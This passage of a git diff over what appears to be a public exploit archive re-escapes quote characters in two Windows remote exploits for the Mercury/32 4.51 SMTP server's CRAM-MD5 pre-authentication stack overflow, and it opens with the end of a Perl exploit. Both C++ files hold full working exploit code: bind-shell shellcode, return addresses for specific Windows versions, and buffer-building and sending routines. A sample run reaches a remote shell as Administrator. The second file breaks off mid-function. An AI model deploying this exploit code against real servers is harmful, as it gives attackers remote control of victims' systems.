+print \"Done.\\n\";
 
 
 close($victim);
 
 $host = $ARGV[0];
-print " + connect to 4444 of $host ...\n";
+print \" + connect to 4444 of $host ...\\n\";
 sleep(3);
-system("telnet $host 4444");
+system(\"telnet $host 4444\");
 
 exit;
 
diff --git a/platforms/windows/remote/4301.cpp b/platforms/windows/remote/4301.cpp
index 290c26aff..f26b54504 100755
--- a/platforms/windows/remote/4301.cpp
+++ b/platforms/windows/remote/4301.cpp
@@ -13,7 +13,7 @@
 
   It will bind a cmdshell on port 1154 if successful.
 
-Z:\Exp\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
+Z:\\Exp\\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
 == Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
 == Public Version 1.0
 == http://www.ph4nt0m.org   2007-08-22
@@ -30,13 +30,13 @@ Z:\Exp\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
 [C] Send Payload...
 [-] Done! cmdshell@1154?
 
-Z:\Exp\Mercury SMTPD\Mercury SMTPD>nc -vv 127.0.0.1 1154
+Z:\\Exp\\Mercury SMTPD\\Mercury SMTPD>nc -vv 127.0.0.1 1154
 DNS fwd/rev mismatch: localhost != gnu
 localhost [127.0.0.1] 1154 (?) open
 Microsoft Windows XP [°æ±¾ 5.1.2600]
 (C) °æȨËùÓÐ 1985-2001 Microsoft Corp.
 
-e:\MERCURY>whoami
+e:\\MERCURY>whoami
 whoami
 Administrator
   
@@ -46,42 +46,42 @@ Administrator
 #include <io.h>
 #include <stdio.h>
 #include <winsock2.h>
-#pragma comment(lib, "ws2_32")
+#pragma comment(lib, \"ws2_32\")
 
 
 /* win32_bind -  EXITFUNC=thread LPORT=1154 Size=317 Encoder=None http://metasploit.com */
 unsigned char shellcode[] =
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
-"\x66\x68\x04\x82\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
-"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
-"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
-"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
-"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
-"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
-"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
-"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
-"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
+\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\"
+\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\"
+\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\"
+\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\"
+\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\"
+\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\"
+\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\"
+\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\"
+\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\"
+\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\"
+\"\\x66\\x68\\x04\\x82\\x66\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\"
+\"\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\"
+\"\\x55\\xff\\xd0\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\"
+\"\\xd0\\x93\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\"
+\"\\x66\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"
+\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\\xab\"
+\"\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\\x52\\x51\"
+\"\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\"
+\"\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\\xc4\\x64\\xff\\xd6\"
+\"\\x52\\xff\\xd0\\x68\\xef\\xce\\xe0\\x60\\x53\\xff\\xd6\\xff\\xd0\";
 
 
 
 // Base64×Ö·û¼¯
 __inline char GetB64Char(int index)
 {
-    const char szBase64Table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
+    const char szBase64Table[] = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";
     if (index >= 0 && index < 64)
 	return szBase64Table[index];
     
-    return '=';
+    return \'=\';
 }
 
 
@@ -128,13 +128,13 @@ inline int Base64Encode(char * base64code, const char * src, int src_len)
 	
 	p64[0] = GetB64Char((B0(ulTmp) >> 2) & 0x3F); 
 	p64[1] = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F); 
-	p64[2] = rest > 1 ? GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F) : '='; 
-	p64[3] = rest > 2 ? GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F) : '='; 
+	p64[2] = rest > 1 ? GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F) : \'=\'; 
+	p64[3] = rest > 2 ? GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F) : \'=\'; 
 	p64 += 4; 
 	len += 4;
     }
     
-    *p64 = '\0'; 
+    *p64 = \'\\0\'; 
     
     return len;
 }
@@ -159,7 +159,7 @@ char* GetErrorMessage(DWORD dwMessageId)
 		return ErrorMessage;
     else
     {
-		sprintf(ErrorMessage, "ID:%d(%08.8X)", dwMessageId, dwMessageId);
+		sprintf(ErrorMessage, \"ID:%d(%08.8X)\", dwMessageId, dwMessageId);
 		return ErrorMessage;
     }
 
@@ -227,11 +227,11 @@ int check_recv(SOCKET s, char* str_sig)
 		ret = recv(s, buf, sizeof(buf), 0);
 		if(ret > 0)
 		{
-			printf("[S] %s", buf);
+			printf(\"[S] %s\", buf);
 		}
 		else
 		{
-			printf("[-] recv() %s\n",  GetErrorMessage(GetLastError()));
+			printf(\"[-] recv() %s\\n\",  GetErrorMessage(GetLastError()));
 			closesocket(s);
 			ExitProcess(-1);
 		}
@@ -261,7 +261,7 @@ int check_send(SOCKET s, char* buf, unsigned int buf_len)
 	}
 	else
 	{
-		printf("[-] send() %s\n", GetErrorMessage(GetLastError()));
+		printf(\"[-] send() %s\\n\", GetErrorMessage(GetLastError()));
 		closesocket(s);
 		ExitProcess(-1);
 	}
@@ -279,41 +279,41 @@ void exploit_mercury_smtpd(char* ip, unsigned short port)
 
 	memset(buf, 0x90, sizeof(buf));
 	memcpy(&buf[1244-sizeof(shellcode)-32], shellcode, sizeof(shellcode));
-	memcpy(&buf[1244], "\x90\x90\xeb\x06", 4);
-	memcpy(&buf[1244+4], "\x2d\x12\x40\x00", 4);  //universal opcode in mercury.exe. no safeseh
-	memcpy(&buf[1244+4+4], "\x90\x90\x90\x90\xE9\x44\xfd\xff\xff", 9);
-	buf[sizeof(buf)-1] = '\0'; 
+	memcpy(&buf[1244], \"\\x90\\x90\\xeb\\x06\", 4);
+	memcpy(&buf[1244+4], \"\\x2d\\x12\\x40\\x00\", 4);  //universal opcode in mercury.exe. no safeseh
+	memcpy(&buf[1244+4+4], \"\\x90\\x90\\x90\\x90\\xE9\\x44\\xfd\\xff\\xff\", 9);
+	buf[sizeof(buf)-1] = \'\\0\'; 
 
 	memset(payload, 0x00, sizeof(payload));
 	base64_len = Base64Encode(payload, buf, sizeof(buf));
-	memcpy(&payload[base64_len], "\r\n", 3);
+	memcpy(&payload[base64_len], \"\\r\\n\", 3);
 
-	printf("[*] connect to %s:%d ... ", ip, port);
+	printf(\"[*] connect to %s:%d ... \", ip, port);
 	WSAStartup(MAKEWORD(2,2), &wsa);
 	s = MakeConnection(ip, port, 10);
 	if(s <= 0)
 	{
-		printf("Failed! %s\n",  GetErrorMessage(GetLastError()) );
+		printf(\"Failed! %s\\n\",  GetErrorMessage(GetLastError()) );
 		return;
 	}
 	else
 	{
-		printf("OK!\n");
+		printf(\"OK!\\n\");
 	}
 
-	_snprintf(buf, sizeof(buf), "EHLO void#ph4nt0m.org\r\n");
-	printf("[C] %s", buf);
+	_snprintf(buf, sizeof(buf), \"EHLO void#ph4nt0m.org\\r\\n\");
+	printf(\"[C] %s\", buf);
 	check_send(s, buf, strlen(buf));
-	check_recv(s, "250 HELP");
+	check_recv(s, \"250 HELP\");
 		
-	_snprintf(buf, sizeof(buf), "AUTH CRAM-MD5\r\n");
-	printf("[C] %s", buf);
+	_snprintf(buf, sizeof(buf), \"AUTH CRAM-MD5\\r\\n\");
+	printf(\"[C] %s\", buf);
 	check_send(s, buf, strlen(buf));
-	check_recv(s, "334");
+	check_recv(s, \"334\");
 
-	printf("[C] Send Payload...\n");
+	printf(\"[C] Send Payload...\\n\");
 	check_send(s, payload, strlen(payload));
-	printf("[-] Done! cmdshell@1154?\n");
+	printf(\"[-] Done! cmdshell@1154?\\n\");
 	
 	closesocket(s);
 	WSACleanup();
@@ -322,18 +322,18 @@ void exploit_mercury_smtpd(char* ip, unsigned short port)
 
 void main(int argc, char* argv[])
 {
-	printf("== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow\n");
-	printf("== Public Version 1.0\n");
-	printf("== http://www.ph4nt0m.org   2007-08-22\n");
-	printf("== code by Zhenhan.Liu\n\n");
+	printf(\"== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow\\n\");
+	printf(\"== Public Version 1.0\\n\");
+	printf(\"== http://www.ph4nt0m.org   2007-08-22\\n\");
+	printf(\"== code by Zhenhan.Liu\\n\\n\");
 	
 	
 	if(argc==3)
 		exploit_mercury_smtpd(argv[1], atoi(argv[2]));
 	else
 	{
-		printf(	"Usage:\n"
-				"  %s <ip> <port> \n", argv[0]);
+		printf(	\"Usage:\\n\"
+				\"  %s <ip> <port> \\n\", argv[0]);
 	}
 }
 
diff --git a/platforms/windows/remote/4316.cpp b/platforms/windows/remote/4316.cpp
index 6a8163517..91ae3249f 100755
--- a/platforms/windows/remote/4316.cpp
+++ b/platforms/windows/remote/4316.cpp
@@ -28,7 +28,7 @@
 #include <stdlib.h>
 #include <string.h>
 #include <winsock2.h>
-#pragma comment(lib,"ws2_32")
+#pragma comment(lib,\"ws2_32\")
 #include <ctype.h>
 
 
@@ -60,12 +60,12 @@ struct {
 	unsigned long ret ;
 } targets[]= 
 		{	
-			{"UNIVERSAL: Mercury/32 SMTP v4.51 [TER32.dll  ]",        0x258d0d1e },// jmp esp						
-			{"Windows XP SP0 RUSSIAN           [shell32.dll]",        0x77b49bbb },// jmp esp
-			{"Windows XP SP1 RUSSIAN           [user32.dll ]",        0x77db532f },// jmp esp
-			{"Windows XP SP2 RUSSIAN           [shell32.dll]",        0x7d168fe7 },// jmp esp
-			{"Windows 2003 SP0 STANDART        [shell32.dll]",        0x77b0f967 },// jmp esp
-			{"Debug",                                                 0x42424242 },// 
+			{\"UNIVERSAL: Mercury/32 SMTP v4.51 [TER32.dll  ]\",        0x258d0d1e },// jmp esp						
+			{\"Windows XP SP0 RUSSIAN           [shell32.dll]\",        0x77b49bbb },// jmp esp
+			{\"Windows XP SP1 RUSSIAN           [user32.dll ]\",        0x77db532f },// jmp esp
+			{\"Windows XP SP2 RUSSIAN           [shell32.dll]\",        0x7d168fe7 },// jmp esp
+			{\"Windows 2003 SP0 STANDART        [shell32.dll]\",        0x77b0f967 },// jmp esp
+			{\"Debug\",                                                 0x42424242 },// 
 			{NULL,                                                    0x00000000 }
 		};
 
@@ -76,30 +76,30 @@ struct {
 	int length;
 	char * shellcode;
 }shellcodes[]={ 	
-	 {"Bindshell, port 4444   [ args: none ]", 344, 
+	 {\"Bindshell, port 4444   [ args: none ]\", 344, 
 		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
-		"\x2b\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
-		"\x6b\x82\x87\x83\xee\xfc\xe2\xf4\xfe\x01\x69\xca\xea\x92\x7d\x78"
-		"\xfd\x0b\x09\xeb\x26\x4f\x09\xc2\x3e\xe0\xfe\x82\x7a\x6a\x6d\x0c"
-		"\x4d\x73\x09\xd8\x22\x6a\x69\xce\x89\x5f\x09\x86\xec\x5a\x42\x1e"
-		"\xae\xef\x42\xf3\x05\xaa\x48\x8a\x03\xa9\x69\x73\x39\x3f\xa6\xaf"
-		"\x77\x8e\x09\xd8\x26\x6a\x69\xe1\x89\x67\xc9\x0c\x5d\x77\x83\x6c"
-		"\x01\x47\x09\x0e\x6e\x4f\x9e\xe6\xc1\x5a\x59\xe3\x89\x28\xb2\x0c"
-		"\x42\x67\x09\xf7\x1e\xc6\x09\xc7\x0a\x35\xea\x09\x4c\x65\x6e\xd7"
-		"\xfd\xbd\xe4\xd4\x64\x03\xb1\xb5\x6a\x1c\xf1\xb5\x5d\x3f\x7d\x57"
-		"\x6a\xa0\x6f\x7b\x39\x3b\x7d\x51\x5d\xe2\x67\xe1\x83\x86\x8a\x85"
-		"\x57\x01\x80\x78\xd2\x03\x5b\x8e\xf7\xc6\xd5\x78\xd4\x38\xd1\xd4"
-		"\x51\x38\xc1\xd4\x41\x38\x7d\x57\x64\x03\x93\xdb\x64\x38\x0b\x66"
-		"\x97\x03\x26\x9d\x72\xac\xd5\x78\xd4\x01\x92\xd6\x57\x94\x52\xef"
-		"\xa6\xc6\xac\x6e\x55\x94\x54\xd4\x57\x94\x52\xef\xe7\x22\x04\xce"
-		"\x55\x94\x54\xd7\x56\x3f\xd7\x78\xd2\xf8\xea\x60\x7b\xad\xfb\xd0"
-		"\xfd\xbd\xd7\x78\xd2\x0d\xe8\xe3\x64\x03\xe1\xea\x8b\x8e\xe8\xd7"
-		"\x5b\x42\x4e\x0e\xe5\x01\xc6\x0e\xe0\x5a\x42\x74\xa8\x95\xc0\xaa"
-		"\xfc\x29\xae\x14\x8f\x11\xba\x2c\xa9\xc0\xea\xf5\xfc\xd8\x94\x78"
-		"\x77\x2f\x7d\x51\x59\x3c\xd0\xd6\x53\x3a\xe8\x86\x53\x3a\xd7\xd6"
-		"\xfd\xbb\xea\x2a\xdb\x6e\x4c\xd4\xfd\xbd\xe8\x78\xfd\x5c\x7d\x57"
-		"\x89\x3c\x7e\x04\xc6\x0f\x7d\x51\x50\x94\x52\xef\xf2\xe1\x86\xd8"
-		"\x51\x94\x54\x78\xd2\x6b\x82\x87"	
+		\"\\x2b\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\x02\"
+		\"\\x6b\\x82\\x87\\x83\\xee\\xfc\\xe2\\xf4\\xfe\\x01\\x69\\xca\\xea\\x92\\x7d\\x78\"
+		\"\\xfd\\x0b\\x09\\xeb\\x26\\x4f\\x09\\xc2\\x3e\\xe0\\xfe\\x82\\x7a\\x6a\\x6d\\x0c\"
+		\"\\x4d\\x73\\x09\\xd8\\x22\\x6a\\x69\\xce\\x89\\x5f\\x09\\x86\\xec\\x5a\\x42\\x1e\"
+		\"\\xae\\xef\\x42\\xf3\\x05\\xaa\\x48\\x8a\\x03\\xa9\\x69\\x73\\x39\\x3f\\xa6\\xaf\"
+		\"\\x77\\x8e\\x09\\xd8\\x26\\x6a\\x69\\xe1\\x89\\x67\\xc9\\x0c\\x5d\\x77\\x83\\x6c\"
+		\"\\x01\\x47\\x09\\x0e\\x6e\\x4f\\x9e\\xe6\\xc1\\x5a\\x59\\xe3\\x89\\x28\\xb2\\x0c\"
+		\"\\x42\\x67\\x09\\xf7\\x1e\\xc6\\x09\\xc7\\x0a\\x35\\xea\\x09\\x4c\\x65\\x6e\\xd7\"
+		\"\\xfd\\xbd\\xe4\\xd4\\x64\\x03\\xb1\\xb5\\x6a\\x1c\\xf1\\xb5\\x5d\\x3f\\x7d\\x57\"
+		\"\\x6a\\xa0\\x6f\\x7b\\x39\\x3b\\x7d\\x51\\x5d\\xe2\\x67\\xe1\\x83\\x86\\x8a\\x85\"
+		\"\\x57\\x01\\x80\\x78\\xd2\\x03\\x5b\\x8e\\xf7\\xc6\\xd5\\x78\\xd4\\x38\\xd1\\xd4\"
+		\"\\x51\\x38\\xc1\\xd4\\x41\\x38\\x7d\\x57\\x64\\x03\\x93\\xdb\\x64\\x38\\x0b\\x66\"
+		\"\\x97\\x03\\x26\\x9d\\x72\\xac\\xd5\\x78\\xd4\\x01\\x92\\xd6\\x57\\x94\\x52\\xef\"
+		\"\\xa6\\xc6\\xac\\x6e\\x55\\x94\\x54\\xd4\\x57\\x94\\x52\\xef\\xe7\\x22\\x04\\xce\"
+		\"\\x55\\x94\\x54\\xd7\\x56\\x3f\\xd7\\x78\\xd2\\xf8\\xea\\x60\\x7b\\xad\\xfb\\xd0\"
+		\"\\xfd\\xbd\\xd7\\x78\\xd2\\x0d\\xe8\\xe3\\x64\\x03\\xe1\\xea\\x8b\\x8e\\xe8\\xd7\"
+		\"\\x5b\\x42\\x4e\\x0e\\xe5\\x01\\xc6\\x0e\\xe0\\x5a\\x42\\x74\\xa8\\x95\\xc0\\xaa\"
+		\"\\xfc\\x29\\xae\\x14\\x8f\\x11\\xba\\x2c\\xa9\\xc0\\xea\\xf5\\xfc\\xd8\\x94\\x78\"
+		\"\\x77\\x2f\\x7d\\x51\\x59\\x3c\\xd0\\xd6\\x53\\x3a\\xe8\\x86\\x53\\x3a\\xd7\\xd6\"
+		\"\\xfd\\xbb\\xea\\x2a\\xdb\\x6e\\x4c\\xd4\\xfd\\xbd\\xe8\\x78\\xfd\\x5c\\x7d\\x57\"
+		\"\\x89\\x3c\\x7e\\x04\\xc6\\x0f\\x7d\\x51\\x50\\x94\\x52\\xef\\xf2\\xe1\\x86\\xd8\"
+		\"\\x51\\x94\\x54\\x78\\xd2\\x6b\\x82\\x87\"	
 	 },	  	
 	{NULL , NULL }
 };
@@ -110,13 +110,13 @@ struct {
 // -----------------------------------------------------------------
 
 char base64_chars[] = 
-             "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-             "abcdefghijklmnopqrstuvwxyz"
-             "0123456789+/";
+             \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"
+             \"abcdefghijklmnopqrstuvwxyz\"
+             \"0123456789+/\";
 
 
 static inline bool is_base64(unsigned char c) {
-  return (isalnum(c) || (c == '+') || (c == '/'));
+  return (isalnum(c) || (c == \'+\') || (c == \'/\'));
 }
 
 void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) 
@@ -145,7 +145,7 @@ void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, ch
   if (i)
   {
     for(j = i; j < 3; j++)
-      char_array_3[j] = '\0';
+      char_array_3[j] = \'\\0\';
 
     char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
     char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
@@ -157,8 +157,8 @@ void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, ch
       //ret += base64_chars[char_array_4[j]];
 
     while((i++ < 3))
-		ret[strlen(ret)]='=';
-      //ret += '=';
+		ret[strlen(ret)]=\'=\';
+      //ret += \'=\';
 
   }
 
@@ -173,7 +173,7 @@ void base64_decode(char const * encoded_string, char * ret)
   int in_ = 0;
   unsigned char char_array_4[4], char_array_3[3];
 
-  while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) 
+  while (in_len-- && ( encoded_string[in_] != \'=\') && is_base64(encoded_string[in_])) 
   {
     char_array_4[i++] = encoded_string[in_]; in_++;
     if (i ==4) {
@@ -216,7 +216,7 @@ void base64_decode(char const * encoded_string, char * ret)
 int main(int argc, char **argv)
 {
 	char * remotehost=NULL;
-	char default_remotehost[]="127.0.0.1";
+	char default_remotehost[]=\"127.0.0.1\";
 	char temp1[100], temp2[100];
 	int port, itarget, sh;
 	SOCKET s;
@@ -236,23 +236,23 @@ int main(int argc, char **argv)
 	sh=0;
 	// ------------	
 	
-	while((c = getopt(argc, argv, "h:p:s:t:"))!= EOF)
+	while((c = getopt(argc, argv, \"h:p:s:t:\"))!= EOF)
 	{
 		switch (c)
 		{
-			case 'h':
+			case \'h\':
 				remotehost=optarg;
 				break; 	
-			case 's':
-				sscanf(optarg, "%d", &sh);
+			case \'s\':
+				sscanf(optarg, \"%d\", &sh);
 				sh--;
 				break;
-			case 't':
-				sscanf(optarg, "%d", &itarget);
+			case \'t\':
+				sscanf(optarg, \"%d\", &itarget);
 				itarget--;
 				break;
-			case 'p':
-				sscanf(optarg, "%d", &port);
+			case \'p\':
+				sscanf(optarg, \"%d\", &port);
 				break;
 			default:
 	            usage(argv[0]);
@@ -263,43 +263,43 @@ int main(int argc, char **argv)
 	if(remotehost == NULL) remotehost=default_remotehost;
 	memset(temp1,0,sizeof(temp1));
 	memset(temp2,0,sizeof(temp2));
-	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
-	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
-	sprintf(temp2, "%d", port);
+	memset(temp1, \'\\x20\' , 58 - strlen(remotehost) -1);	
+	printf(\" #  Host    : %s%s# \\n\", remotehost, temp1);	
+	sprintf(temp2, \"%d\", port);
 	memset(temp1,0,sizeof(temp1));
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-	printf(" #  Port    : %s%s# \n", temp2, temp1);
+	memset(temp1, \'\\x20\' , 58 - strlen(temp2) -1);
+	printf(\" #  Port    : %s%s# \\n\", temp2, temp1);
 	memset(temp1,0,sizeof(temp1));	
 	memset(temp2,0,sizeof(temp2));
-	sprintf(temp2, "%s", shellcodes[sh].name );
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
-	printf(" #  Payload : %s%s# \n", temp2, temp1);	
+	sprintf(temp2, \"%s\", shellcodes[sh].name );
+	memset(temp1, \'\\x20\' , 58 - strlen(temp2) -1);	
+	printf(\" #  Payload : %s%s# \\n\", temp2, temp1);	
 	if(itarget>=0)
 	{
 		memset(temp1,0,sizeof(temp1));	
-		memset(temp1, '\x20' , 57 - strlen(targets[itarget].t) -1);	
-		printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);
+		memset(temp1, \'\\x20\' , 57 - strlen(targets[itarget].t) -1);	
+		printf(\" #  Target  : %s%s# \\n\", targets[itarget].t, temp1);
 	}else
 	{		
-		printf(" # ------------------------------------------------------------------- # \n");
-		printf("[-] Target is invalid\n");
+		printf(\" # ------------------------------------------------------------------- # \\n\");
+		printf(\"[-] Target is invalid\\n\");
 		end_logo();
 		return -1;		
 	}	
-	printf(" # ------------------------------------------------------------------- # \n");
+	printf(\" # ------------------------------------------------------------------- # \\n\");
 	fflush(stdout);
-	printf("[+] Checking if server is online\n");
+	printf(\"[+] Checking if server is online\\n\");
 	fflush(stdout);
 
 	s=do_connect(remotehost, port);   
 	if(s==-1)
 	{
-		printf("[-] Server is OFFLINE\n");
+		printf(\"[-] Server is OFFLINE\\n\");
 		end_logo();
 		return 0;
 	}
 	closesocket(s);
-	printf("[+] Server is ONLINE\n");
+	printf(\"[+] Server is ONLINE\\n\");
 
 	
 	
@@ -310,17 +310,17 @@ int main(int argc, char **argv)
 	fflush(stdout);
 	make_buffer(buf, &len, itarget, sh);
 
-	printf("[+] Attacking buffers constructed\n");
+	printf(\"[+] Attacking buffers constructed\\n\");
 	if(send_buffer(buf, len, remotehost,port)==-1)
 	{
-		printf("[-] Cannot exploit server %s\n", remotehost);
+		printf(\"[-] Cannot exploit server %s\\n\", remotehost);
 		end_logo();
 		WSACleanup();
 		return -1;
 	}
 
-	printf("[+] Buffer sent");
-	printf("[+] Now try connect to %s:%d\n", remotehost, 4444);	
+	printf(\"[+] Buffer sent\");
+	printf(\"[+] Now try connect to %s:%d\\n\", remotehost, 4444);	
 	end_logo();
 	return 0;
 }
@@ -335,7 +335,7 @@ SOCKET do_connect (char *remotehost, int port)
        host = gethostbyname(remotehost);
        if (!host)
        {
-           perror("[-] gethostbyname() failed");
+           perror(\"[-] gethostbyname() failed\");
            return -1;
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
@@ -344,7 +344,7 @@ SOCKET do_connect (char *remotehost, int port)
    if (s == -1)
    {
        closesocket(s);
-       perror("socket() failed");
+       perror(\"socket() failed\");
        return -1;
    }
 
@@ -380,7 +380,7 @@ void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
 	unsigned char * cp=buf;
 
 		// init
-	memset(cp, '\x41', 1300);
+	memset(cp, \'\\x41\', 1300);
 	cp+=204;
 
 		// replace EIP
@@ -390,10 +390,10 @@ void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
 	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
 
 		// jff
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\x90';
+	*cp++ = \'\\x90\';
+	*cp++ = \'\\x90\';
+	*cp++ = \'\\x90\';
+	*cp++ = \'\\x90\';
 
 		// copy the shellcode
 	memcpy(cp, fsh, fshlen);
@@ -416,42 +416,42 @@ int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int po
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf("[+] Server: %s\n", bufmax);
+	printf(\"[+] Server: %s\\n\", bufmax);
 
 	// send EHLO
 	memset(sendbuf, 0, sizeof(sendbuf));
-	strcat(sendbuf, "EHLO Dreatica-FXP\r\n");
-	printf("[+] Request: EHLO Dreatica-FXP\n");
+	strcat(sendbuf, \"EHLO Dreatica-FXP\\r\\n\");
+	printf(\"[+] Request: EHLO Dreatica-FXP\\n\");
 	send(s, sendbuf, (int)strlen(sendbuf),0);
 	
 	// send AUTH CRAM-MD5
 	memset(sendbuf, 0, sizeof(sendbuf));
-	strcat(sendbuf, "AUTH CRAM-MD5\r\n");
-	printf("[+] Request: AUTH CRAM-MD5\n");
+	strcat(sendbuf, \"AUTH CRAM-MD5\\r\\n\");
+	printf(\"[+] Request: AUTH CRAM-MD5\\n\");
 	send(s, sendbuf, (int)strlen(sendbuf),0);
 
 	
-	// i don't make the correct recv procedure like Zhenhan.Liu have done in his code
+	// i don\'t make the correct recv procedure like Zhenhan.Liu have done in his code
 	// just put 3 recv for that
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf("[+] Reply: %s\n",bufmax);	
